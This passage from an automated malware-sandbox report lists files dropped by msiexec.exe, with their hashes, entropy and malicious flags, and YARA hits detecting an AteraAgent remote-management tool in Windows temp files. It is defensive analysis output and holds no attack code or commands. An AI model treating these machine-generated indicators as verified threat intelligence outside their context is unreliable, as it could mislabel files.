                                                                                                                                                                                                                                                                                                                                  SHA-256:3DBBB36F35D8D48AEB28398470CF3D86E18B7CEA99721ACE711DAD9A60F8A27A
                                                                                                                                                                                                                                                                                                                                  SHA-512:AFEB6D7CAAB6F5027A3383500A10627F09E7F48B073C5F1E55C96B9D1129477C54B465042C2172315F01231BA4479A9CC874F7E3773702F5213F2A191633A992
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.6016373332287588
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:v8PhTuRc06WXz+FT5RdXynMSjndddwEqdGUDjxbQiSsndddSE8ly:uhT1jFTlCnMf3DtNaE
                                                                                                                                                                                                                                                                                                                                  MD5:65ECED2C79FFBFDA5DA7C3090F89513B
                                                                                                                                                                                                                                                                                                                                  SHA1:2DC29C13D2BF2E2527CFC4E929969436DBA0AA04
                                                                                                                                                                                                                                                                                                                                  SHA-256:A32952614B92F166011E18EA13A33E2D57896715C1B0B45EFE55A748D23D9AD6
                                                                                                                                                                                                                                                                                                                                  SHA-512:759F4544CB4E8C01EF89378155D54F3874A4B2CD7198F9C9F92F392C84442859874CEFFD77B119F89DE172FF8F9A355DA6F2C372B0E3EA6CF2C08E73B09EE188
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF18D9F86597CA5126.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.6046824865930789
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:QYz8Ph4uRc06WXzAFT5FRddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:Lah411FTvdWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:B92FF4A308F3B808673B7406600F4685
                                                                                                                                                                                                                                                                                                                                  SHA1:D67BCB2BE319C693B6EE2556516F093B93C0E2E3
                                                                                                                                                                                                                                                                                                                                  SHA-256:25D3A6AEC26C39755D64BB97348F23917D9AED9FCCF952344969E231E9510AC0
                                                                                                                                                                                                                                                                                                                                  SHA-512:5F4BD28F2284DA96EEE715B9A30C5F0EEB778EFD4DE530F04E97476592E121E9BF9A33EF88CFE8BD0AEB19F48BC58EF4A47736C6AD4E96EE7979DF4703601D9D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF1972A83F22094FA6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.278218715250536
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:VOLuXth8FXz/T5b/dXynMSjndddwEqdGUDjxbQiSsndddSE8ly:gLXBTVVCnMf3DtNaE
                                                                                                                                                                                                                                                                                                                                  MD5:F86B0BFFC128D2A5E37EE400EB92F02F
                                                                                                                                                                                                                                                                                                                                  SHA1:1881A81F7AF0442DF010985DC914E5374E458899
                                                                                                                                                                                                                                                                                                                                  SHA-256:C70304084C95123C5A99FAC85999E7587216DDD45860D07A49468BCB7ED7AF4C
                                                                                                                                                                                                                                                                                                                                  SHA-512:8C2B2C1E23742726CDF830CCECDE32582712073874775107A6C48089027667677F9628CC3CA9E95F267D300B949FDCD13CE9012351F136F1B8F4B1954F290252
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF1D98EA98A0F27BD7.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.094953908748899
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MxucuA5YHr6gsffcvSOxWX5WclJnJjCL0IcuA5YHr6gsffcvSOxWX5WclJnJjC:2vdGHPssvS8c15dGHPssvS8c
                                                                                                                                                                                                                                                                                                                                  MD5:72C2BDF3D07A65200CA34E668DC4AB91
                                                                                                                                                                                                                                                                                                                                  SHA1:F6DF3315F64A44B73C90B7D6034629E4A4276593
                                                                                                                                                                                                                                                                                                                                  SHA-256:058F6F6474964727D496CA4469E2A69F309EB5C0D14D7F522D84B38CFBD09920
                                                                                                                                                                                                                                                                                                                                  SHA-512:496E4FFE72C8B4C645562858FB0255FB96886961D073B4D285A153A6D78E1F8E8238ED66E3FCC295217E548F3C32AF8522164A3CC6F3CC689D955E4AF45E09E1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.07957035983066839
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOxgIYqICN/K9IKLIUSVky6l/X:2F0i8n0itFzDHFxgIjNxKR/X
                                                                                                                                                                                                                                                                                                                                  MD5:C584EBAB63FADE959CA713DE5E61B9FE
                                                                                                                                                                                                                                                                                                                                  SHA1:04626806B95D1B8C9B3212C646EA715217A95E6A
                                                                                                                                                                                                                                                                                                                                  SHA-256:324A20E8D4B0FD8D553397ECEA4877E20BB7B1DC2B709BAB914AD75C11BEAE5D
                                                                                                                                                                                                                                                                                                                                  SHA-512:F3633B74C48AEE72D5F5AC77F2A2D15FF86922026FEF75DC5087A60BCB83935B7E4FA5CD56207B3F120B5A21495BA25472597CFCEBE30EDAAF550644EF97FACA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2551492331884888
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:e69u5th8FXz/T5idm3qhSjnd/EqdGUDjxbQ6Ssnd/E8Q:d9RBTkm3qhI3DtNPQ
                                                                                                                                                                                                                                                                                                                                  MD5:1D2589CA75F98D7C99E00B483C9F6B67
                                                                                                                                                                                                                                                                                                                                  SHA1:79115956B2C206DE8C8ECBA56EBA54F6D51E8211
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0FC60527FE35549AFCAC0E62DB5744042BEB486E6AE4DB20F73F49BC2BEDF05
                                                                                                                                                                                                                                                                                                                                  SHA-512:DC9B75AEE923AB079E91B60754D5931C664E69C3410F41022FE4C33A1B5BFEE5B23BA280E0FBD3AB0FD9F7C7A66C41F552269565449825DA0A0E0BF50E47C4A0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF38B1B8C320DF517A.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.094953908748899
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MxucuA5YHr6gsffcvSOxWX5WclJnJjCL0IcuA5YHr6gsffcvSOxWX5WclJnJjC:2vdGHPssvS8c15dGHPssvS8c
                                                                                                                                                                                                                                                                                                                                  MD5:72C2BDF3D07A65200CA34E668DC4AB91
                                                                                                                                                                                                                                                                                                                                  SHA1:F6DF3315F64A44B73C90B7D6034629E4A4276593
                                                                                                                                                                                                                                                                                                                                  SHA-256:058F6F6474964727D496CA4469E2A69F309EB5C0D14D7F522D84B38CFBD09920
                                                                                                                                                                                                                                                                                                                                  SHA-512:496E4FFE72C8B4C645562858FB0255FB96886961D073B4D285A153A6D78E1F8E8238ED66E3FCC295217E548F3C32AF8522164A3CC6F3CC689D955E4AF45E09E1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.094953908748899
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MxucuA5YHr6gsffcvSOxWX5WclJnJjCL0IcuA5YHr6gsffcvSOxWX5WclJnJjC:2vdGHPssvS8c15dGHPssvS8c
                                                                                                                                                                                                                                                                                                                                  MD5:72C2BDF3D07A65200CA34E668DC4AB91
                                                                                                                                                                                                                                                                                                                                  SHA1:F6DF3315F64A44B73C90B7D6034629E4A4276593
                                                                                                                                                                                                                                                                                                                                  SHA-256:058F6F6474964727D496CA4469E2A69F309EB5C0D14D7F522D84B38CFBD09920
                                                                                                                                                                                                                                                                                                                                  SHA-512:496E4FFE72C8B4C645562858FB0255FB96886961D073B4D285A153A6D78E1F8E8238ED66E3FCC295217E548F3C32AF8522164A3CC6F3CC689D955E4AF45E09E1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.6046824865930789
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:QYz8Ph4uRc06WXzAFT5FRddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:Lah411FTvdWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:B92FF4A308F3B808673B7406600F4685
                                                                                                                                                                                                                                                                                                                                  SHA1:D67BCB2BE319C693B6EE2556516F093B93C0E2E3
                                                                                                                                                                                                                                                                                                                                  SHA-256:25D3A6AEC26C39755D64BB97348F23917D9AED9FCCF952344969E231E9510AC0
                                                                                                                                                                                                                                                                                                                                  SHA-512:5F4BD28F2284DA96EEE715B9A30C5F0EEB778EFD4DE530F04E97476592E121E9BF9A33EF88CFE8BD0AEB19F48BC58EF4A47736C6AD4E96EE7979DF4703601D9D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF45939A071886D6FE.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.07928728571212156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO/LfNzGelhqLIUSVky6l/X:2F0i8n0itFzDHFjfIaqR/X
                                                                                                                                                                                                                                                                                                                                  MD5:EA6B4F3F0C52181E2913C44F1E8F4FC1
                                                                                                                                                                                                                                                                                                                                  SHA1:730E207F58450786A296AD2820F2821C977E18FA
                                                                                                                                                                                                                                                                                                                                  SHA-256:4443883A6AA19E21D84A287DB3BA806503985BC5501AC985751F9834BBF06C1E
                                                                                                                                                                                                                                                                                                                                  SHA-512:F6FA55D6BB02E5D55671D0DF89D6852CCE2FDE965028F1CA2BA78703609EE3F2C80A92DF74D61DCF486FFF920EE80208F68E087FF8E1F2711DDAB637E7FB1AC9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.15843847478459164
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:KlEuSsndd4dASjndd4d/EqdGUDjxbQ97ddr:KD/93DtkJd
                                                                                                                                                                                                                                                                                                                                  MD5:352D69374E9E1F6BAFC46A6AF75B827E
                                                                                                                                                                                                                                                                                                                                  SHA1:79EE118545DC3950BE51FEAA5A39EE44E21AAF2B
                                                                                                                                                                                                                                                                                                                                  SHA-256:54C6BC624F74974A6EC79473A0280DB8B6B8DDC8500330028A8E25C3CA67B439
                                                                                                                                                                                                                                                                                                                                  SHA-512:AA1DBE86330156FDB723409615DF6D7ECB8020B8E92E9D640A0DC688BB5F8B64ECAF83B0A63948C4B56F8D064FE210C238BA7B17AC00D58DF068F0898E537CAB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF48BCAB6E3000FF9C.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.6016373332287588
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:v8PhTuRc06WXz+FT5RdXynMSjndddwEqdGUDjxbQiSsndddSE8ly:uhT1jFTlCnMf3DtNaE
                                                                                                                                                                                                                                                                                                                                  MD5:65ECED2C79FFBFDA5DA7C3090F89513B
                                                                                                                                                                                                                                                                                                                                  SHA1:2DC29C13D2BF2E2527CFC4E929969436DBA0AA04
                                                                                                                                                                                                                                                                                                                                  SHA-256:A32952614B92F166011E18EA13A33E2D57896715C1B0B45EFE55A748D23D9AD6
                                                                                                                                                                                                                                                                                                                                  SHA-512:759F4544CB4E8C01EF89378155D54F3874A4B2CD7198F9C9F92F392C84442859874CEFFD77B119F89DE172FF8F9A355DA6F2C372B0E3EA6CF2C08E73B09EE188
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF4BDFDDF68F93C3AD.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.3015028554555976
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Jx/jO38PhMuh3iFip1GE2yza2t4KAQBHofagUMClXte/+oAWS+HesXwZymiL:A8PhMuRc06WXOCFT5aXAWSiXwZy9
                                                                                                                                                                                                                                                                                                                                  MD5:2A5B227715CA7D8BE6719C9EAE981221
                                                                                                                                                                                                                                                                                                                                  SHA1:863D008A637B38524033BAED0F4324A04668FAE1
                                                                                                                                                                                                                                                                                                                                  SHA-256:305504B686A4848F0E09C804E97C48DCBAB789334DE7B75F7AB4E85EE20A9891
                                                                                                                                                                                                                                                                                                                                  SHA-512:D4EC0B7D7028C8A1E211EA39BE693A57F7FD1E24BFD7DA90DB8A40834088F3E348CA8FC73FBEB753925F583F6246F07C409B8A16D164FC779A8903F1C290A94E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
